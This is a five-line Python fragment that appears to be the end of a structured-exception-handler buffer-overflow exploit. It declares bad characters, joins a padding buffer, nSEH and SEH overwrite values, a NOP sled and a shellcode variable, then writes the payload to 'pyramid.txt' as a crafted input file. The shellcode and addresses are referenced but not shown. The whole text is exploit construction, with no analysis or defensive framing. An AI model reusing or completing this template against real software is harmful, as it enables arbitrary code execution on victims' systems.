badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()